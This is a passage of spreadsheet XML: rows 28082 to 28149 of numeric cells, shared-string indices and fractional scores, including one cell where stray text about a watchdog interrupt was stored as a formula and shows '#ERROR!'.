      <c r="C28082" s="2" t="s">
        <v>26985</v>
      </c>
      <c r="D28082" s="2">
        <v>1.0</v>
      </c>
      <c r="E28082" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28082" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="28083" ht="15.75" customHeight="1">
      <c r="A28083" s="1">
        <v>33805.0</v>
      </c>
      <c r="B28083" s="2">
        <v>8838505.0</v>
      </c>
      <c r="C28083" s="2" t="s">
        <v>26986</v>
      </c>
      <c r="D28083" s="2">
        <v>1.0</v>
      </c>
      <c r="E28083" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28083" s="2">
        <v>0.1296296296296297</v>
      </c>
    </row>
    <row r="28084" ht="15.75" customHeight="1">
      <c r="A28084" s="1">
        <v>3834.0</v>
      </c>
      <c r="B28084" s="2">
        <v>4.017983E7</v>
      </c>
      <c r="C28084" s="2" t="s">
        <v>26987</v>
      </c>
      <c r="D28084" s="2">
        <v>1.0</v>
      </c>
      <c r="E28084" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28084" s="2">
        <v>0.1293103448275862</v>
      </c>
    </row>
    <row r="28085" ht="15.75" customHeight="1">
      <c r="A28085" s="1">
        <v>6172.0</v>
      </c>
      <c r="B28085" s="2">
        <v>4.7886995E7</v>
      </c>
      <c r="C28085" s="2" t="s">
        <v>26988</v>
      </c>
      <c r="D28085" s="2">
        <v>1.0</v>
      </c>
      <c r="E28085" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28085" s="2">
        <v>0.1290018832391714</v>
      </c>
    </row>
    <row r="28086" ht="15.75" customHeight="1">
      <c r="A28086" s="1">
        <v>15264.0</v>
      </c>
      <c r="B28086" s="2">
        <v>4.23268E7</v>
      </c>
      <c r="C28086" s="2" t="s">
        <v>26989</v>
      </c>
      <c r="D28086" s="2">
        <v>1.0</v>
      </c>
      <c r="E28086" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28086" s="2">
        <v>0.1290018832391714</v>
      </c>
    </row>
    <row r="28087" ht="15.75" customHeight="1">
      <c r="A28087" s="1">
        <v>32005.0</v>
      </c>
      <c r="B28087" s="2">
        <v>5.3427959E7</v>
      </c>
      <c r="C28087" s="2" t="s">
        <v>26990</v>
      </c>
      <c r="D28087" s="2">
        <v>1.0</v>
      </c>
      <c r="E28087" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28087" s="2">
        <v>0.1287878787878788</v>
      </c>
    </row>
    <row r="28088" ht="15.75" customHeight="1">
      <c r="A28088" s="1">
        <v>261.0</v>
      </c>
      <c r="B28088" s="2">
        <v>1.514975E7</v>
      </c>
      <c r="C28088" s="2" t="s">
        <v>26991</v>
      </c>
      <c r="D28088" s="2">
        <v>1.0</v>
      </c>
      <c r="E28088" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28088" s="2">
        <v>0.1287037037037037</v>
      </c>
    </row>
    <row r="28089" ht="15.75" customHeight="1">
      <c r="A28089" s="1">
        <v>3897.0</v>
      </c>
      <c r="B28089" s="2">
        <v>4.0443839E7</v>
      </c>
      <c r="C28089" s="2" t="s">
        <v>26992</v>
      </c>
      <c r="D28089" s="2">
        <v>1.0</v>
      </c>
      <c r="E28089" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28089" s="2">
        <v>0.1287037037037037</v>
      </c>
    </row>
    <row r="28090" ht="15.75" customHeight="1">
      <c r="A28090" s="1">
        <v>8202.0</v>
      </c>
      <c r="B28090" s="2">
        <v>5.3285828E7</v>
      </c>
      <c r="C28090" s="2" t="s">
        <v>26993</v>
      </c>
      <c r="D28090" s="2">
        <v>1.0</v>
      </c>
      <c r="E28090" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28090" s="2">
        <v>0.1287037037037037</v>
      </c>
    </row>
    <row r="28091" ht="15.75" customHeight="1">
      <c r="A28091" s="1">
        <v>12848.0</v>
      </c>
      <c r="B28091" s="2">
        <v>3.1767259E7</v>
      </c>
      <c r="C28091" s="2" t="s">
        <v>26994</v>
      </c>
      <c r="D28091" s="2">
        <v>1.0</v>
      </c>
      <c r="E28091" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28091" s="2">
        <v>0.1287037037037037</v>
      </c>
    </row>
    <row r="28092" ht="15.75" customHeight="1">
      <c r="A28092" s="1">
        <v>15128.0</v>
      </c>
      <c r="B28092" s="2">
        <v>4.1887722E7</v>
      </c>
      <c r="C28092" s="2" t="s">
        <v>26995</v>
      </c>
      <c r="D28092" s="2">
        <v>1.0</v>
      </c>
      <c r="E28092" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28092" s="2">
        <v>0.1287037037037037</v>
      </c>
    </row>
    <row r="28093" ht="15.75" customHeight="1">
      <c r="A28093" s="1">
        <v>24184.0</v>
      </c>
      <c r="B28093" s="2">
        <v>1.0262508E7</v>
      </c>
      <c r="C28093" s="2" t="s">
        <v>26996</v>
      </c>
      <c r="D28093" s="2">
        <v>1.0</v>
      </c>
      <c r="E28093" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28093" s="2">
        <v>0.1287037037037037</v>
      </c>
    </row>
    <row r="28094" ht="15.75" customHeight="1">
      <c r="A28094" s="1">
        <v>14623.0</v>
      </c>
      <c r="B28094" s="2">
        <v>4.0300451E7</v>
      </c>
      <c r="C28094" s="2" t="s">
        <v>26997</v>
      </c>
      <c r="D28094" s="2">
        <v>1.0</v>
      </c>
      <c r="E28094" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28094" s="2">
        <v>0.1286008230452675</v>
      </c>
    </row>
    <row r="28095" ht="15.75" customHeight="1">
      <c r="A28095" s="1">
        <v>14995.0</v>
      </c>
      <c r="B28095" s="2">
        <v>4.1434823E7</v>
      </c>
      <c r="C28095" s="2" t="s">
        <v>26998</v>
      </c>
      <c r="D28095" s="2">
        <v>1.0</v>
      </c>
      <c r="E28095" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28095" s="2">
        <v>0.1286008230452675</v>
      </c>
    </row>
    <row r="28096" ht="15.75" customHeight="1">
      <c r="A28096" s="1">
        <v>15145.0</v>
      </c>
      <c r="B28096" s="2">
        <v>4.1941298E7</v>
      </c>
      <c r="C28096" s="2" t="s">
        <v>26999</v>
      </c>
      <c r="D28096" s="2">
        <v>1.0</v>
      </c>
      <c r="E28096" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28096" s="2">
        <v>0.1286008230452675</v>
      </c>
    </row>
    <row r="28097" ht="15.75" customHeight="1">
      <c r="A28097" s="1">
        <v>25740.0</v>
      </c>
      <c r="B28097" s="2">
        <v>1.4594622E7</v>
      </c>
      <c r="C28097" s="2" t="s">
        <v>27000</v>
      </c>
      <c r="D28097" s="2">
        <v>1.0</v>
      </c>
      <c r="E28097" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28097" s="2">
        <v>0.1284153005464481</v>
      </c>
    </row>
    <row r="28098" ht="15.75" customHeight="1">
      <c r="A28098" s="1">
        <v>30467.0</v>
      </c>
      <c r="B28098" s="2">
        <v>3.9535842E7</v>
      </c>
      <c r="C28098" s="2" t="s">
        <v>27001</v>
      </c>
      <c r="D28098" s="2">
        <v>1.0</v>
      </c>
      <c r="E28098" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28098" s="2">
        <v>0.1284153005464481</v>
      </c>
    </row>
    <row r="28099" ht="15.75" customHeight="1">
      <c r="A28099" s="1">
        <v>6220.0</v>
      </c>
      <c r="B28099" s="2">
        <v>4.8023626E7</v>
      </c>
      <c r="C28099" s="2" t="s">
        <v>27002</v>
      </c>
      <c r="D28099" s="2">
        <v>1.0</v>
      </c>
      <c r="E28099" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28099" s="2">
        <v>0.1282828282828283</v>
      </c>
    </row>
    <row r="28100" ht="15.75" customHeight="1">
      <c r="A28100" s="1">
        <v>1127.0</v>
      </c>
      <c r="B28100" s="2">
        <v>2.4170952E7</v>
      </c>
      <c r="C28100" s="2" t="s">
        <v>27003</v>
      </c>
      <c r="D28100" s="2">
        <v>1.0</v>
      </c>
      <c r="E28100" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28100" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="28101" ht="15.75" customHeight="1">
      <c r="A28101" s="1">
        <v>20721.0</v>
      </c>
      <c r="B28101" s="2">
        <v>1.4657213E7</v>
      </c>
      <c r="C28101" s="2" t="s">
        <v>27004</v>
      </c>
      <c r="D28101" s="2">
        <v>1.0</v>
      </c>
      <c r="E28101" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28101" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="28102" ht="15.75" customHeight="1">
      <c r="A28102" s="1">
        <v>21105.0</v>
      </c>
      <c r="B28102" s="2">
        <v>1.8146171E7</v>
      </c>
      <c r="C28102" s="2" t="s">
        <v>26962</v>
      </c>
      <c r="D28102" s="2">
        <v>1.0</v>
      </c>
      <c r="E28102" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28102" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="28103" ht="15.75" customHeight="1">
      <c r="A28103" s="1">
        <v>31605.0</v>
      </c>
      <c r="B28103" s="2">
        <v>5135183.0</v>
      </c>
      <c r="C28103" s="2" t="s">
        <v>27005</v>
      </c>
      <c r="D28103" s="2">
        <v>1.0</v>
      </c>
      <c r="E28103" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28103" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="28104" ht="15.75" customHeight="1">
      <c r="A28104" s="1">
        <v>32615.0</v>
      </c>
      <c r="B28104" s="2">
        <v>5829792.0</v>
      </c>
      <c r="C28104" s="2" t="s">
        <v>27006</v>
      </c>
      <c r="D28104" s="2">
        <v>1.0</v>
      </c>
      <c r="E28104" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28104" s="2">
        <v>0.1282828282828282</v>
      </c>
    </row>
    <row r="28105" ht="15.75" customHeight="1">
      <c r="A28105" s="1">
        <v>8606.0</v>
      </c>
      <c r="B28105" s="2">
        <v>5.4267144E7</v>
      </c>
      <c r="C28105" s="2" t="s">
        <v>27007</v>
      </c>
      <c r="D28105" s="2">
        <v>1.0</v>
      </c>
      <c r="E28105" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28105" s="2">
        <v>0.1281362007168459</v>
      </c>
    </row>
    <row r="28106" ht="15.75" customHeight="1">
      <c r="A28106" s="1">
        <v>9485.0</v>
      </c>
      <c r="B28106" s="2">
        <v>5.5899928E7</v>
      </c>
      <c r="C28106" s="2" t="s">
        <v>27008</v>
      </c>
      <c r="D28106" s="2">
        <v>1.0</v>
      </c>
      <c r="E28106" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28106" s="2">
        <v>0.1281362007168459</v>
      </c>
    </row>
    <row r="28107" ht="15.75" customHeight="1">
      <c r="A28107" s="1">
        <v>13971.0</v>
      </c>
      <c r="B28107" s="2">
        <v>3.7332667E7</v>
      </c>
      <c r="C28107" s="2" t="s">
        <v>27009</v>
      </c>
      <c r="D28107" s="2">
        <v>1.0</v>
      </c>
      <c r="E28107" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28107" s="2">
        <v>0.1281362007168459</v>
      </c>
    </row>
    <row r="28108" ht="15.75" customHeight="1">
      <c r="A28108" s="1">
        <v>19740.0</v>
      </c>
      <c r="B28108" s="2">
        <v>5.6690984E7</v>
      </c>
      <c r="C28108" s="2" t="s">
        <v>27010</v>
      </c>
      <c r="D28108" s="2">
        <v>1.0</v>
      </c>
      <c r="E28108" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28108" s="2">
        <v>0.1281362007168459</v>
      </c>
    </row>
    <row r="28109" ht="15.75" customHeight="1">
      <c r="A28109" s="1">
        <v>29069.0</v>
      </c>
      <c r="B28109" s="2">
        <v>3.0320592E7</v>
      </c>
      <c r="C28109" s="2" t="s">
        <v>27011</v>
      </c>
      <c r="D28109" s="2">
        <v>1.0</v>
      </c>
      <c r="E28109" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28109" s="2">
        <v>0.1281362007168459</v>
      </c>
    </row>
    <row r="28110" ht="15.75" customHeight="1">
      <c r="A28110" s="1">
        <v>1764.0</v>
      </c>
      <c r="B28110" s="2">
        <v>2.893542E7</v>
      </c>
      <c r="C28110" s="2" t="s">
        <v>27012</v>
      </c>
      <c r="D28110" s="2">
        <v>1.0</v>
      </c>
      <c r="E28110" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28110" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="28111" ht="15.75" customHeight="1">
      <c r="A28111" s="1">
        <v>4948.0</v>
      </c>
      <c r="B28111" s="2">
        <v>4.4051517E7</v>
      </c>
      <c r="C28111" s="2" t="s">
        <v>27013</v>
      </c>
      <c r="D28111" s="2">
        <v>1.0</v>
      </c>
      <c r="E28111" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28111" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="28112" ht="15.75" customHeight="1">
      <c r="A28112" s="1">
        <v>5543.0</v>
      </c>
      <c r="B28112" s="2">
        <v>4.5924925E7</v>
      </c>
      <c r="C28112" s="2" t="str">
        <f>Update 01:======================
Now I am going to use watchdog interrupt to give me more information when watchdog is triggered.</f>
        <v>#ERROR!</v>
      </c>
      <c r="D28112" s="2">
        <v>1.0</v>
      </c>
      <c r="E28112" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28112" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="28113" ht="15.75" customHeight="1">
      <c r="A28113" s="1">
        <v>6607.0</v>
      </c>
      <c r="B28113" s="2">
        <v>4.9016981E7</v>
      </c>
      <c r="C28113" s="2" t="s">
        <v>27014</v>
      </c>
      <c r="D28113" s="2">
        <v>1.0</v>
      </c>
      <c r="E28113" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28113" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="28114" ht="15.75" customHeight="1">
      <c r="A28114" s="1">
        <v>9272.0</v>
      </c>
      <c r="B28114" s="2">
        <v>5.5502785E7</v>
      </c>
      <c r="C28114" s="2" t="s">
        <v>27015</v>
      </c>
      <c r="D28114" s="2">
        <v>1.0</v>
      </c>
      <c r="E28114" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28114" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="28115" ht="15.75" customHeight="1">
      <c r="A28115" s="1">
        <v>10478.0</v>
      </c>
      <c r="B28115" s="2">
        <v>1.090461E7</v>
      </c>
      <c r="C28115" s="2" t="s">
        <v>27016</v>
      </c>
      <c r="D28115" s="2">
        <v>1.0</v>
      </c>
      <c r="E28115" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28115" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="28116" ht="15.75" customHeight="1">
      <c r="A28116" s="1">
        <v>11075.0</v>
      </c>
      <c r="B28116" s="2">
        <v>1.8410687E7</v>
      </c>
      <c r="C28116" s="2" t="s">
        <v>27017</v>
      </c>
      <c r="D28116" s="2">
        <v>1.0</v>
      </c>
      <c r="E28116" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28116" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="28117" ht="15.75" customHeight="1">
      <c r="A28117" s="1">
        <v>15287.0</v>
      </c>
      <c r="B28117" s="2">
        <v>4.2418983E7</v>
      </c>
      <c r="C28117" s="2" t="s">
        <v>27018</v>
      </c>
      <c r="D28117" s="2">
        <v>1.0</v>
      </c>
      <c r="E28117" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28117" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="28118" ht="15.75" customHeight="1">
      <c r="A28118" s="1">
        <v>19151.0</v>
      </c>
      <c r="B28118" s="2">
        <v>5.4847683E7</v>
      </c>
      <c r="C28118" s="2" t="s">
        <v>27019</v>
      </c>
      <c r="D28118" s="2">
        <v>1.0</v>
      </c>
      <c r="E28118" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28118" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="28119" ht="15.75" customHeight="1">
      <c r="A28119" s="1">
        <v>19219.0</v>
      </c>
      <c r="B28119" s="2">
        <v>5.5014226E7</v>
      </c>
      <c r="C28119" s="2" t="s">
        <v>27020</v>
      </c>
      <c r="D28119" s="2">
        <v>1.0</v>
      </c>
      <c r="E28119" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28119" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="28120" ht="15.75" customHeight="1">
      <c r="A28120" s="1">
        <v>20006.0</v>
      </c>
      <c r="B28120" s="2">
        <v>5.7731839E7</v>
      </c>
      <c r="C28120" s="2" t="s">
        <v>27021</v>
      </c>
      <c r="D28120" s="2">
        <v>1.0</v>
      </c>
      <c r="E28120" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28120" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="28121" ht="15.75" customHeight="1">
      <c r="A28121" s="1">
        <v>20150.0</v>
      </c>
      <c r="B28121" s="2">
        <v>1.0204209E7</v>
      </c>
      <c r="C28121" s="2" t="s">
        <v>27022</v>
      </c>
      <c r="D28121" s="2">
        <v>1.0</v>
      </c>
      <c r="E28121" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28121" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="28122" ht="15.75" customHeight="1">
      <c r="A28122" s="1">
        <v>20788.0</v>
      </c>
      <c r="B28122" s="2">
        <v>1.5156107E7</v>
      </c>
      <c r="C28122" s="2" t="s">
        <v>27023</v>
      </c>
      <c r="D28122" s="2">
        <v>1.0</v>
      </c>
      <c r="E28122" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28122" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="28123" ht="15.75" customHeight="1">
      <c r="A28123" s="1">
        <v>20855.0</v>
      </c>
      <c r="B28123" s="2">
        <v>1.5772023E7</v>
      </c>
      <c r="C28123" s="2" t="s">
        <v>27024</v>
      </c>
      <c r="D28123" s="2">
        <v>1.0</v>
      </c>
      <c r="E28123" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28123" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="28124" ht="15.75" customHeight="1">
      <c r="A28124" s="1">
        <v>22643.0</v>
      </c>
      <c r="B28124" s="2">
        <v>4.074105E7</v>
      </c>
      <c r="C28124" s="2" t="s">
        <v>27025</v>
      </c>
      <c r="D28124" s="2">
        <v>1.0</v>
      </c>
      <c r="E28124" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28124" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="28125" ht="15.75" customHeight="1">
      <c r="A28125" s="1">
        <v>23454.0</v>
      </c>
      <c r="B28125" s="2">
        <v>5.6918359E7</v>
      </c>
      <c r="C28125" s="2" t="s">
        <v>27026</v>
      </c>
      <c r="D28125" s="2">
        <v>1.0</v>
      </c>
      <c r="E28125" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28125" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="28126" ht="15.75" customHeight="1">
      <c r="A28126" s="1">
        <v>26272.0</v>
      </c>
      <c r="B28126" s="2">
        <v>1.639789E7</v>
      </c>
      <c r="C28126" s="2" t="s">
        <v>26979</v>
      </c>
      <c r="D28126" s="2">
        <v>1.0</v>
      </c>
      <c r="E28126" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28126" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="28127" ht="15.75" customHeight="1">
      <c r="A28127" s="1">
        <v>26667.0</v>
      </c>
      <c r="B28127" s="2">
        <v>1.8062124E7</v>
      </c>
      <c r="C28127" s="2" t="s">
        <v>27027</v>
      </c>
      <c r="D28127" s="2">
        <v>1.0</v>
      </c>
      <c r="E28127" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28127" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="28128" ht="15.75" customHeight="1">
      <c r="A28128" s="1">
        <v>26671.0</v>
      </c>
      <c r="B28128" s="2">
        <v>1.8075693E7</v>
      </c>
      <c r="C28128" s="2" t="s">
        <v>27027</v>
      </c>
      <c r="D28128" s="2">
        <v>1.0</v>
      </c>
      <c r="E28128" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28128" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="28129" ht="15.75" customHeight="1">
      <c r="A28129" s="1">
        <v>26676.0</v>
      </c>
      <c r="B28129" s="2">
        <v>1.8075693E7</v>
      </c>
      <c r="C28129" s="2" t="s">
        <v>27027</v>
      </c>
      <c r="D28129" s="2">
        <v>1.0</v>
      </c>
      <c r="E28129" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28129" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="28130" ht="15.75" customHeight="1">
      <c r="A28130" s="1">
        <v>26791.0</v>
      </c>
      <c r="B28130" s="2">
        <v>1.8611733E7</v>
      </c>
      <c r="C28130" s="2" t="s">
        <v>27028</v>
      </c>
      <c r="D28130" s="2">
        <v>1.0</v>
      </c>
      <c r="E28130" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28130" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="28131" ht="15.75" customHeight="1">
      <c r="A28131" s="1">
        <v>28099.0</v>
      </c>
      <c r="B28131" s="2">
        <v>2.4657323E7</v>
      </c>
      <c r="C28131" s="2" t="s">
        <v>27029</v>
      </c>
      <c r="D28131" s="2">
        <v>1.0</v>
      </c>
      <c r="E28131" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28131" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="28132" ht="15.75" customHeight="1">
      <c r="A28132" s="1">
        <v>28151.0</v>
      </c>
      <c r="B28132" s="2">
        <v>2.4828126E7</v>
      </c>
      <c r="C28132" s="2" t="s">
        <v>27030</v>
      </c>
      <c r="D28132" s="2">
        <v>1.0</v>
      </c>
      <c r="E28132" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28132" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="28133" ht="15.75" customHeight="1">
      <c r="A28133" s="1">
        <v>30077.0</v>
      </c>
      <c r="B28133" s="2">
        <v>3625318.0</v>
      </c>
      <c r="C28133" s="2" t="s">
        <v>27031</v>
      </c>
      <c r="D28133" s="2">
        <v>1.0</v>
      </c>
      <c r="E28133" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28133" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="28134" ht="15.75" customHeight="1">
      <c r="A28134" s="1">
        <v>31331.0</v>
      </c>
      <c r="B28134" s="2">
        <v>4.9746252E7</v>
      </c>
      <c r="C28134" s="2" t="s">
        <v>27032</v>
      </c>
      <c r="D28134" s="2">
        <v>1.0</v>
      </c>
      <c r="E28134" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28134" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="28135" ht="15.75" customHeight="1">
      <c r="A28135" s="1">
        <v>31869.0</v>
      </c>
      <c r="B28135" s="2">
        <v>5285794.0</v>
      </c>
      <c r="C28135" s="2" t="s">
        <v>27033</v>
      </c>
      <c r="D28135" s="2">
        <v>1.0</v>
      </c>
      <c r="E28135" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28135" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="28136" ht="15.75" customHeight="1">
      <c r="A28136" s="1">
        <v>32894.0</v>
      </c>
      <c r="B28136" s="2">
        <v>6394174.0</v>
      </c>
      <c r="C28136" s="2" t="s">
        <v>27034</v>
      </c>
      <c r="D28136" s="2">
        <v>1.0</v>
      </c>
      <c r="E28136" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28136" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="28137" ht="15.75" customHeight="1">
      <c r="A28137" s="1">
        <v>34036.0</v>
      </c>
      <c r="B28137" s="2">
        <v>9567498.0</v>
      </c>
      <c r="C28137" s="2" t="s">
        <v>27035</v>
      </c>
      <c r="D28137" s="2">
        <v>1.0</v>
      </c>
      <c r="E28137" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28137" s="2">
        <v>0.1279761904761905</v>
      </c>
    </row>
    <row r="28138" ht="15.75" customHeight="1">
      <c r="A28138" s="1">
        <v>25895.0</v>
      </c>
      <c r="B28138" s="2">
        <v>1.498375E7</v>
      </c>
      <c r="C28138" s="2" t="s">
        <v>27036</v>
      </c>
      <c r="D28138" s="2">
        <v>1.0</v>
      </c>
      <c r="E28138" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28138" s="2">
        <v>0.1278659611992946</v>
      </c>
    </row>
    <row r="28139" ht="15.75" customHeight="1">
      <c r="A28139" s="1">
        <v>25967.0</v>
      </c>
      <c r="B28139" s="2">
        <v>1.526871E7</v>
      </c>
      <c r="C28139" s="2" t="s">
        <v>27037</v>
      </c>
      <c r="D28139" s="2">
        <v>1.0</v>
      </c>
      <c r="E28139" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28139" s="2">
        <v>0.1278659611992946</v>
      </c>
    </row>
    <row r="28140" ht="15.75" customHeight="1">
      <c r="A28140" s="1">
        <v>19639.0</v>
      </c>
      <c r="B28140" s="2">
        <v>5.6282151E7</v>
      </c>
      <c r="C28140" s="2" t="s">
        <v>27038</v>
      </c>
      <c r="D28140" s="2">
        <v>1.0</v>
      </c>
      <c r="E28140" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28140" s="2">
        <v>0.1276803118908382</v>
      </c>
    </row>
    <row r="28141" ht="15.75" customHeight="1">
      <c r="A28141" s="1">
        <v>31500.0</v>
      </c>
      <c r="B28141" s="2">
        <v>5.0682317E7</v>
      </c>
      <c r="C28141" s="2" t="s">
        <v>27039</v>
      </c>
      <c r="D28141" s="2">
        <v>1.0</v>
      </c>
      <c r="E28141" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28141" s="2">
        <v>0.1276803118908382</v>
      </c>
    </row>
    <row r="28142" ht="15.75" customHeight="1">
      <c r="A28142" s="1">
        <v>6107.0</v>
      </c>
      <c r="B28142" s="2">
        <v>4.7735631E7</v>
      </c>
      <c r="C28142" s="2" t="s">
        <v>27040</v>
      </c>
      <c r="D28142" s="2">
        <v>1.0</v>
      </c>
      <c r="E28142" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28142" s="2">
        <v>0.1276041666666667</v>
      </c>
    </row>
    <row r="28143" ht="15.75" customHeight="1">
      <c r="A28143" s="1">
        <v>29083.0</v>
      </c>
      <c r="B28143" s="2">
        <v>3.0348782E7</v>
      </c>
      <c r="C28143" s="2" t="s">
        <v>27041</v>
      </c>
      <c r="D28143" s="2">
        <v>1.0</v>
      </c>
      <c r="E28143" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28143" s="2">
        <v>0.1276041666666667</v>
      </c>
    </row>
    <row r="28144" ht="15.75" customHeight="1">
      <c r="A28144" s="1">
        <v>10003.0</v>
      </c>
      <c r="B28144" s="2">
        <v>5.7015772E7</v>
      </c>
      <c r="C28144" s="2" t="s">
        <v>27042</v>
      </c>
      <c r="D28144" s="2">
        <v>1.0</v>
      </c>
      <c r="E28144" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28144" s="2">
        <v>0.1274928774928775</v>
      </c>
    </row>
    <row r="28145" ht="15.75" customHeight="1">
      <c r="A28145" s="1">
        <v>524.0</v>
      </c>
      <c r="B28145" s="2">
        <v>1.8389013E7</v>
      </c>
      <c r="C28145" s="2" t="s">
        <v>27043</v>
      </c>
      <c r="D28145" s="2">
        <v>1.0</v>
      </c>
      <c r="E28145" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28145" s="2">
        <v>0.1273946360153257</v>
      </c>
    </row>
    <row r="28146" ht="15.75" customHeight="1">
      <c r="A28146" s="1">
        <v>5539.0</v>
      </c>
      <c r="B28146" s="2">
        <v>4.591458E7</v>
      </c>
      <c r="C28146" s="2" t="s">
        <v>27044</v>
      </c>
      <c r="D28146" s="2">
        <v>1.0</v>
      </c>
      <c r="E28146" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28146" s="2">
        <v>0.1273946360153257</v>
      </c>
    </row>
    <row r="28147" ht="15.75" customHeight="1">
      <c r="A28147" s="1">
        <v>14641.0</v>
      </c>
      <c r="B28147" s="2">
        <v>4.0354266E7</v>
      </c>
      <c r="C28147" s="2" t="s">
        <v>27045</v>
      </c>
      <c r="D28147" s="2">
        <v>1.0</v>
      </c>
      <c r="E28147" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28147" s="2">
        <v>0.1273946360153257</v>
      </c>
    </row>
    <row r="28148" ht="15.75" customHeight="1">
      <c r="A28148" s="1">
        <v>32814.0</v>
      </c>
      <c r="B28148" s="2">
        <v>6185503.0</v>
      </c>
      <c r="C28148" s="2" t="s">
        <v>27046</v>
      </c>
      <c r="D28148" s="2">
        <v>1.0</v>
      </c>
      <c r="E28148" s="3" t="s">
        <v>26559</v>
      </c>
      <c r="F28148" s="2">
        <v>0.1273946360153256</v>
      </c>
    </row>
    <row r="28149" ht="15.75" customHeight="1">
      <c r="A28149" s="1">
        <v>24060.0</v>
      </c>
